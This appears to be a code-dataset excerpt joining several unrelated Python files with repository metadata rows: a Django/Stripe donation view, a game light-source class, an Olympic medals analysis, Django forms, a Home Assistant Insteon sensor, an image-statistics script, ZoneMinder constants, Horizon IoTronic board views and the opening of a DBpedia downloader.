    donator_temp = DonatorInfo(donator_name=request.POST['nickname'],
                               amount=request.POST['amount'],
                               # 'desciption' matches the (misspelled) field name posted by the form
                               description=request.POST['desciption'],
                               total_amount=int(DonatorInfo.objects.last().total_amount if DonatorInfo.objects.last() else 5647) + amount)
    donator_temp.save()
    print('\nData:', request.POST)
    print(f'Total Donated: {DonatorInfo.objects.last().total_amount}')
    print(f'Donators: {DonatorInfo.objects.all()}')
    customer = stripe.Customer.create(
        email=request.POST['email'],
        name=request.POST['nickname'],
        source=request.POST['stripeToken']
    )
    charge = stripe.Charge.create(
        customer=customer,
        # Stripe expects the amount in the smallest currency unit (paise);
        # the 7563 factor presumably bakes in a fixed USD->INR conversion.
        amount=int(amount * 7563),
        currency="inr",
        description=f"{request.POST['desciption']}\nAddress - {request.POST['address']}\nCountry - {request.POST['country']}"
    )
    return redirect(reverse('success', args=[amount]))
def successMsg(request, args):
amount = args
return render(request, 'donations/success.html', {'amount': amount})
| 33.288136 | 142 | 0.651731 | 197 | 1,964 | 6.441624 | 0.345178 | 0.095351 | 0.086682 | 0.06383 | 0.133176 | 0.107171 | 0.107171 | 0.107171 | 0.107171 | 0.107171 | 0 | 0.020381 | 0.22556 | 1,964 | 58 | 143 | 33.862069 | 0.813938 | 0 | 0 | 0 | 0 | 0.02439 | 0.239308 | 0.161405 | 0 | 0 | 0 | 0 | 0 | 1 | 0.097561 | false | 0 | 0.146341 | 0.02439 | 0.341463 | 0.073171 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad7c0a31d46092e4cb43d3f5d08f21d343b14c27 | 1,121 | py | Python | components/light_source.py | TheNicGard/DungeonStar | 525aeb53217166d2ce83e4e91a3b8c1b102f0dcb | [
"MIT"
] | 3 | 2019-07-11T17:54:42.000Z | 2021-03-09T10:58:13.000Z | components/light_source.py | BandW2011/DungeonStar | 525aeb53217166d2ce83e4e91a3b8c1b102f0dcb | [
"MIT"
] | 1 | 2019-07-11T17:55:38.000Z | 2020-05-03T06:34:56.000Z | components/light_source.py | TheNicGard/DungeonStar | 525aeb53217166d2ce83e4e91a3b8c1b102f0dcb | [
"MIT"
] | null | null | null | import tcod as libtcod
from game_messages import Message
class LightSource:
def __init__(self, light, max_duration, duration=0, permanent=False, enchantment=0):
self.light = light
self.max_duration = max_duration
self.duration = duration
self.permanent = permanent
self.enchantment = enchantment
self.lit = False
@property
def get_light(self):
if self.lit and (self.duration > 0 or self.permanent):
return self.light + self.enchantment
else:
return 0
def tick(self, message_log, in_inventory):
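        # Burn one turn of fuel; once depleted, report it (only if the item
        # is in the player's inventory) and extinguish the light.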
if self.lit and self.duration > 0 and not self.permanent:
self.duration -= 1
if self.duration <= 0:
if in_inventory and self.lit and self.owner and self.owner.owner:
message_log.add_message(Message("The {0} went out!".format(self.owner.owner.get_name), libtcod.yellow))
self.lit = False
@property
def get_char(self):
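        # 254/255 are presumably the lit/unlit glyphs in the game's tileset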
if self.get_light > 0:
return 254
else:
return 255
| 31.138889 | 123 | 0.599465 | 139 | 1,121 | 4.71223 | 0.323741 | 0.091603 | 0.045802 | 0.064122 | 0.155725 | 0.155725 | 0.076336 | 0 | 0 | 0 | 0 | 0.019711 | 0.321142 | 1,121 | 35 | 124 | 32.028571 | 0.840999 | 0 | 0 | 0.206897 | 0 | 0 | 0.015165 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.137931 | false | 0 | 0.068966 | 0 | 0.37931 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad7cd46950319b21616fc2d3ce6d25726bb14f34 | 4,096 | py | Python | code.py | AshishLohana/olympic-hero | 1612f43df1b03c4ecd53a9fcd2de6865fc813f62 | [
"MIT"
] | null | null | null | code.py | AshishLohana/olympic-hero | 1612f43df1b03c4ecd53a9fcd2de6865fc813f62 | [
"MIT"
] | null | null | null | code.py | AshishLohana/olympic-hero | 1612f43df1b03c4ecd53a9fcd2de6865fc813f62 | [
"MIT"
] | null | null | null | # --------------
#Importing header files
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
#Path of the file
data = pd.read_csv(path)
data.rename(columns={"Total":"Total_Medals"}, inplace = True)
print(data.head(10))
#Code starts here
# --------------
#Code starts here
data['Better_Event'] = np.where(
    data['Total_Summer'] > data['Total_Winter'], 'Summer',
    np.where(data['Total_Summer'] < data['Total_Winter'], 'Winter', 'Both'))
better_ = data['Better_Event'].value_counts()
print(type(better_))
better_event = better_.idxmax()
print(better_event)
# --------------
#Code starts here
top_countries = data[['Country_Name','Total_Summer','Total_Winter','Total_Medals']].copy()
top_countries.drop(top_countries.index[len(top_countries)-1],inplace=True)
def top_ten(top_,column_):
country_list = []
t = top_.nlargest(10,column_)
print(t)
print("top ten countries: ")
print(list(t['Country_Name']))
country_list = list(t['Country_Name'])
return country_list
top_10_summer = top_ten(top_countries,'Total_Summer')
top_10_winter = top_ten(top_countries,'Total_Winter')
top_10 = top_ten(top_countries,'Total_Medals')
common = []
for i in top_10_summer:
    if (i in top_10_winter) and (i in top_10):
common.append(i)
print(common)
# --------------
#Code starts here
summer_df = data[data['Country_Name'].isin(top_10_summer)]
winter_df = data[data['Country_Name'].isin(top_10_winter)]
top_df = data[data['Country_Name'].isin(top_10)]
print(" summer medalists: ",summer_df)
print(" winter medalists: ",winter_df)
print(" top medalists: ",top_df)
plt.bar(x = summer_df['Country_Name'],height=summer_df['Total_Summer'])
plt.bar(x = winter_df['Country_Name'],height=winter_df['Total_Winter'])
plt.bar(x = top_df['Country_Name'],height=top_df['Total_Medals'])
# --------------
#Code starts here
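# Golden_Ratio = share of gold medals among all medals won in that event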
summer_df['Golden_Ratio'] = summer_df['Gold_Summer']/summer_df['Total_Summer']
summer_max_ratio = summer_df['Golden_Ratio'].max()
summer_country_gold = summer_df['Country_Name'][summer_df['Golden_Ratio'].idxmax()]
winter_df['Golden_Ratio'] = winter_df['Gold_Winter']/winter_df['Total_Winter']
winter_max_ratio = winter_df['Golden_Ratio'].max()
winter_country_gold = winter_df['Country_Name'][winter_df['Golden_Ratio'].idxmax()]
top_df['Golden_Ratio'] = top_df['Gold_Total']/top_df['Total_Medals']
top_max_ratio = top_df['Golden_Ratio'].max()
top_country_gold = top_df['Country_Name'][top_df['Golden_Ratio'].idxmax()]
# --------------
#Code starts here
data = pd.read_csv(path)
data_1 = data.copy()
data_1.drop((len(data_1)-1), axis=0, inplace=True)
print(data_1)
# weight the medals (gold=3, silver=2, bronze=1) without overwriting the
# original medal counts, which are plotted again further down
data_1['Total_Points'] = 3*data_1['Gold_Total'] + 2*data_1['Silver_Total'] + data_1['Bronze_Total']
most_points = data_1['Total_Points'].max()
best_country = data_1['Country_Name'][data_1['Total_Points'].idxmax()]
# --------------
#Code starts here
best_ = data_1[data_1['Country_Name'] == best_country]
best = best_[['Gold_Total','Silver_Total','Bronze_Total']]
print(best)
best.plot.bar()
plt.xlabel(best_country)
plt.ylabel('Medals Tally')
plt.xticks(rotation=45)
| 25.283951 | 162 | 0.675781 | 588 | 4,096 | 4.377551 | 0.159864 | 0.040793 | 0.045455 | 0.037296 | 0.283217 | 0.240093 | 0.21756 | 0.200466 | 0.12432 | 0.121989 | 0 | 0.015173 | 0.131104 | 4,096 | 161 | 163 | 25.440994 | 0.708064 | 0.234863 | 0 | 0.031746 | 0 | 0 | 0.270461 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.015873 | false | 0 | 0.047619 | 0 | 0.079365 | 0.190476 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad7e389141e1b8bd68ab703479154232d7e009cc | 2,731 | py | Python | challenges/forms.py | bitblueprint/RunningCause | 22114cec0a68ba8a2b7a3c143b71a587f273c7f1 | [
"MIT"
] | 3 | 2015-09-29T14:12:34.000Z | 2016-07-29T08:20:16.000Z | challenges/forms.py | bitblueprint/RunningCause | 22114cec0a68ba8a2b7a3c143b71a587f273c7f1 | [
"MIT"
] | 1 | 2016-07-29T10:38:47.000Z | 2016-08-01T08:32:48.000Z | challenges/forms.py | bitblueprint/RunningCause | 22114cec0a68ba8a2b7a3c143b71a587f273c7f1 | [
"MIT"
] | 3 | 2015-07-16T07:52:27.000Z | 2018-01-05T08:03:09.000Z | # coding: utf8
from datetime import date
from django import forms
from .models import Challenge
from django.utils.translation import ugettext as _
from django.contrib.auth import get_user_model
class ChallengeForm(forms.ModelForm):
runner = forms.ModelChoiceField(label=_("Runner"),
queryset=get_user_model().objects.all(),
required=False)
sponsor = forms.ModelChoiceField(label=_("Sponsor"),
queryset=get_user_model().objects.all(),
required=False)
amount = forms.FloatField(label=_("Amount (kr)"),
widget=forms.TextInput(
attrs={'class': 'form-control'}),
localize=True, required=True)
end_date = forms.DateField(label=_("End date"),
widget=forms.DateInput(
attrs={'class': 'form-control',
'id': 'challenge_datepicker',
'autocomplete': "off"}),
required=True)
challenge_text = forms.CharField(label=_("What is the challenge?"),
required=True,
widget=forms.Textarea(
attrs={'class': 'form-control'}))
class Meta:
model = Challenge
fields = ['runner', 'sponsor', 'amount', 'end_date', 'challenge_text']
def is_valid(self):
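        # run the standard field validation first, then layer on
        # cross-field business rules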
valid = super(ChallengeForm, self).is_valid()
if not valid:
return valid
if self.cleaned_data['amount'] < 0:
self.add_error('amount', _('Amount cannot be negative'))
valid = False
if self.cleaned_data['end_date'] < date.today():
self.add_error('end_date', _('End date cannot be in the past'))
valid = False
return valid
class ChallengeFeedbackForm(forms.Form):
feedback_msg = forms.CharField(
max_length=500, min_length=2,
label=_("Please write a message"),
widget=forms.Textarea(attrs={'class': 'form-control'})
)
class ChallengeChallengePreviewForm(forms.ModelForm):
class Meta:
model = Challenge
fields = ['amount', 'end_date', 'challenge_text']
def __init__(self, *args, **kwargs):
super(ChallengeChallengePreviewForm, self).__init__(*args, **kwargs)
instance = getattr(self, 'instance', None)
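        # an already-saved challenge is previewed read-only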
if instance and instance.pk:
for fname in self.fields:
self.fields[fname].widget.attrs['readonly'] = True
| 36.413333 | 78 | 0.534969 | 255 | 2,731 | 5.568627 | 0.384314 | 0.034507 | 0.039437 | 0.059155 | 0.202113 | 0.164789 | 0.123944 | 0.123944 | 0 | 0 | 0 | 0.003413 | 0.35628 | 2,731 | 74 | 79 | 36.905405 | 0.804323 | 0.004394 | 0 | 0.214286 | 0 | 0 | 0.128451 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.089286 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad87c69bd0feef648d2e5c35ecaf3a32de758035 | 2,489 | py | Python | homeassistant/components/insteon/binary_sensor.py | erogleva/core | 994ae09f69afe772150a698953c0d7386a745de2 | [
"Apache-2.0"
] | 6 | 2017-08-02T19:26:39.000Z | 2020-03-14T22:47:41.000Z | homeassistant/components/insteon/binary_sensor.py | erogleva/core | 994ae09f69afe772150a698953c0d7386a745de2 | [
"Apache-2.0"
] | 56 | 2020-08-03T07:30:54.000Z | 2022-03-31T06:02:04.000Z | homeassistant/components/insteon/binary_sensor.py | erogleva/core | 994ae09f69afe772150a698953c0d7386a745de2 | [
"Apache-2.0"
] | 14 | 2018-08-19T16:28:26.000Z | 2021-09-02T18:26:53.000Z | """Support for INSTEON binary sensors via PowerLinc Modem."""
from pyinsteon.groups import (
CO_SENSOR,
DOOR_SENSOR,
HEARTBEAT,
LEAK_SENSOR_WET,
LIGHT_SENSOR,
LOW_BATTERY,
MOTION_SENSOR,
OPEN_CLOSE_SENSOR,
SENSOR_MALFUNCTION,
SMOKE_SENSOR,
TEST_SENSOR,
)
from homeassistant.components.binary_sensor import (
DEVICE_CLASS_BATTERY,
DEVICE_CLASS_DOOR,
DEVICE_CLASS_GAS,
DEVICE_CLASS_LIGHT,
DEVICE_CLASS_MOISTURE,
DEVICE_CLASS_MOTION,
DEVICE_CLASS_OPENING,
DEVICE_CLASS_PROBLEM,
DEVICE_CLASS_SAFETY,
DEVICE_CLASS_SMOKE,
DOMAIN as BINARY_SENSOR_DOMAIN,
BinarySensorEntity,
)
from homeassistant.helpers.dispatcher import async_dispatcher_connect
from .const import SIGNAL_ADD_ENTITIES
from .insteon_entity import InsteonEntity
from .utils import async_add_insteon_entities
SENSOR_TYPES = {
OPEN_CLOSE_SENSOR: DEVICE_CLASS_OPENING,
MOTION_SENSOR: DEVICE_CLASS_MOTION,
DOOR_SENSOR: DEVICE_CLASS_DOOR,
LEAK_SENSOR_WET: DEVICE_CLASS_MOISTURE,
LIGHT_SENSOR: DEVICE_CLASS_LIGHT,
LOW_BATTERY: DEVICE_CLASS_BATTERY,
CO_SENSOR: DEVICE_CLASS_GAS,
SMOKE_SENSOR: DEVICE_CLASS_SMOKE,
TEST_SENSOR: DEVICE_CLASS_SAFETY,
SENSOR_MALFUNCTION: DEVICE_CLASS_PROBLEM,
HEARTBEAT: DEVICE_CLASS_PROBLEM,
}
async def async_setup_entry(hass, config_entry, async_add_entities):
"""Set up the Insteon binary sensors from a config entry."""
def add_entities(discovery_info=None):
"""Add the Insteon entities for the platform."""
async_add_insteon_entities(
hass,
BINARY_SENSOR_DOMAIN,
InsteonBinarySensorEntity,
async_add_entities,
discovery_info,
)
signal = f"{SIGNAL_ADD_ENTITIES}_{BINARY_SENSOR_DOMAIN}"
async_dispatcher_connect(hass, signal, add_entities)
add_entities()
class InsteonBinarySensorEntity(InsteonEntity, BinarySensorEntity):
"""A Class for an Insteon binary sensor entity."""
def __init__(self, device, group):
"""Initialize the INSTEON binary sensor."""
super().__init__(device, group)
self._sensor_type = SENSOR_TYPES.get(self._insteon_device_group.name)
@property
def device_class(self):
"""Return the class of this sensor."""
return self._sensor_type
@property
def is_on(self):
"""Return the boolean response if the node is on."""
return bool(self._insteon_device_group.value)
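# Note (not in the original module): device_class resolution above is a plain
# dict lookup keyed on the pyinsteon group name; an unknown group name yields
# None, so Home Assistant falls back to a generic binary sensor.
#   SENSOR_TYPES.get(MOTION_SENSOR)    # -> DEVICE_CLASS_MOTION
#   SENSOR_TYPES.get("made_up_group")  # -> None (hypothetical key)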
| 28.94186 | 77 | 0.728003 | 298 | 2,489 | 5.667785 | 0.295302 | 0.14328 | 0.070456 | 0.027235 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.202491 | 2,489 | 85 | 78 | 29.282353 | 0.850882 | 0.102049 | 0 | 0.030303 | 0 | 0 | 0.020522 | 0.020522 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060606 | false | 0 | 0.090909 | 0 | 0.19697 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad888c844745a00e448a736ad6859feb01cf87f3 | 1,626 | py | Python | dataset/calculate_dataset_mean.py | AmirMoghadamFalahi/frcnn-pod | d9ab2d78e28881ce2ae8ab69ae31d1f752e7aa28 | [
"MIT"
] | null | null | null | dataset/calculate_dataset_mean.py | AmirMoghadamFalahi/frcnn-pod | d9ab2d78e28881ce2ae8ab69ae31d1f752e7aa28 | [
"MIT"
] | null | null | null | dataset/calculate_dataset_mean.py | AmirMoghadamFalahi/frcnn-pod | d9ab2d78e28881ce2ae8ab69ae31d1f752e7aa28 | [
"MIT"
] | null | null | null | """
In this script we calculate the per-channel image mean and standard
deviation over the training set only; the statistics are deliberately
not computed on the whole dataset.
"""
import numpy as np
import cv2
import timeit
from os import listdir
from os.path import isdir
from tqdm import tqdm
# number of channels of the dataset image, 3 for color jpg, 1 for grayscale img
# you need to change it to reflect your dataset
CHANNEL_NUM = 3
def cal_dir_stat(root: str):
if not root.endswith('/'):
root += '/'
file_paths = [root + f for f in listdir(root) if not isdir(root + f)]  # test the full path, not the bare name
pixel_num = 0 # store all pixel number in the dataset
channel_sum = np.zeros(CHANNEL_NUM)
channel_sum_squared = np.zeros(CHANNEL_NUM)
for file_path in tqdm(file_paths):
im = cv2.imread(file_path) # image in M*N*CHANNEL_NUM shape, channel in BGR order
# im = im / 255.0
pixel_num += (im.size / CHANNEL_NUM)
channel_sum += np.sum(im, axis=(0, 1))
channel_sum_squared += np.sum(np.square(im), axis=(0, 1))
bgr_mean = channel_sum / pixel_num
bgr_std = np.sqrt(channel_sum_squared / pixel_num - np.square(bgr_mean))
# change the format from bgr to rgb
rgb_mean = list(bgr_mean)[::-1]
rgb_std = list(bgr_std)[::-1]
return rgb_mean, rgb_std
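# Sanity-check sketch (not part of the original script): the running sums
# above implement the identity std = sqrt(E[x^2] - E[x]^2), which can be
# verified against numpy's one-pass std on synthetic data:
#   data = np.random.randint(0, 256, (10, 10, CHANNEL_NUM)).astype(float)
#   pixels = data.reshape(-1, CHANNEL_NUM)
#   mean = pixels.mean(axis=0)
#   std = np.sqrt((pixels ** 2).mean(axis=0) - mean ** 2)
#   assert np.allclose(std, pixels.std(axis=0))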
# cal_dir_stat() only reads the image files directly under train_root;
# subdirectories (e.g. per-class folders) are skipped, so the statistics
# come from the training images alone.
train_root = "training_images/"
start = timeit.default_timer()
mean, std = cal_dir_stat(train_root)
end = timeit.default_timer()
print("elapsed time: {}".format(end - start))
print("mean:{}\nstd:{}".format(mean, std))
| 30.111111 | 90 | 0.694342 | 264 | 1,626 | 4.121212 | 0.397727 | 0.055147 | 0.046875 | 0.03125 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012336 | 0.202337 | 1,626 | 53 | 91 | 30.679245 | 0.826523 | 0.324108 | 0 | 0 | 0 | 0 | 0.045203 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.033333 | false | 0 | 0.2 | 0 | 0.266667 | 0.066667 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad890a1d4d6c292c94c8daa1e937e277a1ae7700 | 335 | py | Python | homeassistant/components/zoneminder/const.py | ccatterina/core | 36789cfc310f270bf343676eb94d123e5d0dfa83 | [
"Apache-2.0"
] | 6 | 2016-11-25T06:36:27.000Z | 2021-11-16T11:20:23.000Z | homeassistant/components/zoneminder/const.py | ccatterina/core | 36789cfc310f270bf343676eb94d123e5d0dfa83 | [
"Apache-2.0"
] | 45 | 2020-10-15T06:47:06.000Z | 2022-03-31T06:26:16.000Z | homeassistant/components/zoneminder/const.py | ccatterina/core | 36789cfc310f270bf343676eb94d123e5d0dfa83 | [
"Apache-2.0"
] | 2 | 2020-11-17T09:19:47.000Z | 2020-12-16T03:56:09.000Z | """Constants for zoneminder component."""
CONF_PATH_ZMS = "path_zms"
DEFAULT_PATH = "/zm/"
DEFAULT_PATH_ZMS = "/zm/cgi-bin/nph-zms"
DEFAULT_SSL = False
DEFAULT_VERIFY_SSL = True
DOMAIN = "zoneminder"
SERVICE_SET_RUN_STATE = "set_run_state"
PLATFORM_CONFIGS = "platform_configs"
CONFIG_DATA = "config_data"
API_CLIENT = "api_client"
| 22.333333 | 41 | 0.770149 | 48 | 335 | 4.958333 | 0.5625 | 0.088235 | 0.092437 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.110448 | 335 | 14 | 42 | 23.928571 | 0.798658 | 0.104478 | 0 | 0 | 0 | 0 | 0.309524 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad899414e80df0b727216aac3b6ca1646af784c5 | 8,264 | py | Python | iotronic_ui/project/boards/views.py | MDSLab/iotronic-ops-dashboard | ef12ec244e9ef156322749593c8d17de726f5586 | [
"Apache-2.0"
] | null | null | null | iotronic_ui/project/boards/views.py | MDSLab/iotronic-ops-dashboard | ef12ec244e9ef156322749593c8d17de726f5586 | [
"Apache-2.0"
] | 1 | 2018-10-17T10:59:55.000Z | 2018-10-30T11:58:40.000Z | iotronic_ui/project/boards/views.py | MDSLab/iotronic-ops-dashboard | ef12ec244e9ef156322749593c8d17de726f5586 | [
"Apache-2.0"
] | null | null | null | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.core.urlresolvers import reverse
from django.core.urlresolvers import reverse_lazy
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
# from horizon import messages
from horizon import tables
from horizon import tabs
from horizon.utils import memoized
from openstack_dashboard.api import iotronic
from openstack_dashboard import policy
from openstack_dashboard.dashboards.project.boards \
import forms as project_forms
from openstack_dashboard.dashboards.project.boards \
import tables as project_tables
from openstack_dashboard.dashboards.project.boards \
import tabs as project_tabs
LOG = logging.getLogger(__name__)
class IndexView(tables.DataTableView):
table_class = project_tables.BoardsTable
template_name = 'project/boards/index.html'
page_title = _("Boards")
def get_data(self):
boards = []
# Admin
if policy.check((("iot", "iot:list_all_boards"),), self.request):
try:
boards = iotronic.board_list(self.request, None, None)
except Exception:
exceptions.handle(self.request,
_('Unable to retrieve boards list.'))
# Admin_iot_project
elif policy.check((("iot", "iot:list_project_boards"),), self.request):
try:
boards = iotronic.board_list(self.request, None, None)
except Exception:
exceptions.handle(self.request,
_('Unable to retrieve user boards list.'))
# Other users
else:
try:
boards = iotronic.board_list(self.request, None, None)
except Exception:
exceptions.handle(self.request,
_('Unable to retrieve user boards list.'))
for board in boards:
board_services = iotronic.services_on_board(self.request, board.uuid, True)
# board.__dict__.update(dict(services=board_services))
board._info.update(dict(services=board_services))
return boards
class CreateView(forms.ModalFormView):
template_name = 'project/boards/create.html'
modal_header = _("Create Board")
form_id = "create_board_form"
form_class = project_forms.CreateBoardForm
submit_label = _("Create Board")
submit_url = reverse_lazy("horizon:project:boards:create")
success_url = reverse_lazy('horizon:project:boards:index')
page_title = _("Create Board")
class UpdateView(forms.ModalFormView):
template_name = 'project/boards/update.html'
modal_header = _("Update Board")
form_id = "update_board_form"
form_class = project_forms.UpdateBoardForm
submit_label = _("Update Board")
submit_url = "horizon:project:boards:update"
success_url = reverse_lazy('horizon:project:boards:index')
page_title = _("Update Board")
@memoized.memoized_method
def get_object(self):
try:
return iotronic.board_get(self.request, self.kwargs['board_id'],
None)
except Exception:
redirect = reverse("horizon:project:boards:index")
exceptions.handle(self.request,
_('Unable to get board information.'),
redirect=redirect)
def get_context_data(self, **kwargs):
context = super(UpdateView, self).get_context_data(**kwargs)
args = (self.get_object().uuid,)
context['submit_url'] = reverse(self.submit_url, args=args)
return context
def get_initial(self):
board = self.get_object()
location = board.location[0]
return {'uuid': board.uuid,
'name': board.name,
'mobile': board.mobile,
'owner': board.owner,
'latitude': location["latitude"],
'longitude': location["longitude"],
'altitude': location["altitude"]}
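# Illustrative note (not in the original): get_initial() flattens the first
# location record of the board into separate form fields, e.g. (all values
# hypothetical):
#   {'uuid': 'b1', 'name': 'board-01', 'mobile': False, 'owner': 'demo',
#    'latitude': '38.19', 'longitude': '15.55', 'altitude': '15.0'}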
class RemovePluginsView(forms.ModalFormView):
template_name = 'project/boards/removeplugins.html'
modal_header = _("Remove Plugins from board")
form_id = "remove_boardplugins_form"
form_class = project_forms.RemovePluginsForm
submit_label = _("Remove Plugins from board")
# submit_url = reverse_lazy("horizon:project:boards:removeplugins")
submit_url = "horizon:project:boards:removeplugins"
success_url = reverse_lazy('horizon:project:boards:index')
page_title = _("Remove Plugins from board")
@memoized.memoized_method
def get_object(self):
try:
return iotronic.board_get(self.request, self.kwargs['board_id'],
None)
except Exception:
redirect = reverse("horizon:project:boards:index")
exceptions.handle(self.request,
_('Unable to get board information.'),
redirect=redirect)
def get_context_data(self, **kwargs):
context = super(RemovePluginsView, self).get_context_data(**kwargs)
args = (self.get_object().uuid,)
context['submit_url'] = reverse(self.submit_url, args=args)
return context
def get_initial(self):
board = self.get_object()
# Populate plugins
# TO BE DONE.....filter by available on this board!!!
# plugins = iotronic.plugin_list(self.request, None, None)
plugins = iotronic.plugins_on_board(self.request, board.uuid)
plugins.sort(key=lambda b: b.name)
plugin_list = []
for plugin in plugins:
plugin_list.append((plugin.uuid, _(plugin.name)))
return {'uuid': board.uuid,
'name': board.name,
'plugin_list': plugin_list}
class DetailView(tabs.TabView):
tab_group_class = project_tabs.BoardDetailTabs
template_name = 'horizon/common/_detail.html'
page_title = "{{ board.name|default:board.uuid }}"
def get_context_data(self, **kwargs):
context = super(DetailView, self).get_context_data(**kwargs)
board = self.get_data()
context["board"] = board
context["url"] = reverse(self.redirect_url)
context["actions"] = self._get_actions(board)
return context
def _get_actions(self, board):
table = project_tables.BoardsTable(self.request)
return table.render_row_actions(board)
@memoized.memoized_method
def get_data(self):
board_id = self.kwargs['board_id']
try:
board_services = []
board_plugins = []
board = iotronic.board_get(self.request, board_id, None)
board_services = iotronic.services_on_board(self.request, board_id, True)
board._info.update(dict(services=board_services))
board_plugins = iotronic.plugins_on_board(self.request, board_id)
board._info.update(dict(plugins=board_plugins))
# LOG.debug("BOARD: %s\n\n%s", board, board._info)
except Exception:
# use board_id: "board" may be unbound here if board_get() raised
msg = 'Unable to retrieve board %s information' % board_id
exceptions.handle(self.request, msg, ignore=True)
return board
def get_tabs(self, request, *args, **kwargs):
board = self.get_data()
return self.tab_group_class(request, board=board, **kwargs)
class BoardDetailView(DetailView):
redirect_url = 'horizon:project:boards:index'
def _get_actions(self, board):
table = project_tables.BoardsTable(self.request)
return table.render_row_actions(board)
| 35.774892 | 87 | 0.640973 | 930 | 8,264 | 5.505376 | 0.205376 | 0.047266 | 0.039063 | 0.031641 | 0.532422 | 0.486133 | 0.419141 | 0.361133 | 0.318359 | 0.298047 | 0 | 0.000818 | 0.260528 | 8,264 | 230 | 88 | 35.930435 | 0.837015 | 0.106607 | 0 | 0.453416 | 0 | 0 | 0.142644 | 0.064529 | 0 | 0 | 0 | 0 | 0 | 1 | 0.074534 | false | 0 | 0.086957 | 0 | 0.465839 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
ad8ad52f4e1eb69af645bff60f5f340b30df206b | 2,881 | py | Python | code/python/src/slub_docsa/data/load/dbpedia.py | slub/docsa | c33a8243a60fbccbcd0a6418a59337e4ed39dc75 | [
"Apache-2.0"
] | 11 | 2022-01-05T17:19:10.000Z | 2022-02-14T18:57:37.000Z | code/python/src/slub_docsa/data/load/dbpedia.py | slub/docsa | c33a8243a60fbccbcd0a6418a59337e4ed39dc75 | [
"Apache-2.0"
] | null | null | null | code/python/src/slub_docsa/data/load/dbpedia.py | slub/docsa | c33a8243a60fbccbcd0a6418a59337e4ed39dc75 | [
"Apache-2.0"
] | null | null | null | """Loads Dbpedia resources."""
import logging
import os
import bz2
import re
from typing import Iterator
import urllib.request
import urllib.parse
import shutil
from slub_docsa.common.paths import get_resources_dir
logger = logging.getLogger(__name__)
def _get_dbpedia_download_url(lang_code):
filename = f"short-abstracts_lang={lang_code}.ttl.bz2"
return f"https://databus.dbpedia.org/dbpedia/text/short-abstracts/2020.07.01/{filename}"
def _get_dbpedia_abstracts_filepath(lang_code, dbpedia_resources_dir: str = None):
if dbpedia_resources_dir is None:
dbpedia_resources_dir = os.path.join(get_resources_dir(), "dbpedia")
return os.path.join(dbpedia_resources_dir, f"short-abstracts_lang={lang_code}.ttl.bz2")
def _download_dbpedia_abstracts(lang_code: str, filepath: str = None, dbpedia_resources_dir: str = None):
# create resources dir if not exists
if dbpedia_resources_dir is None:
dbpedia_resources_dir = os.path.join(get_resources_dir(), "dbpedia")
os.makedirs(dbpedia_resources_dir, exist_ok=True)
if filepath is None:
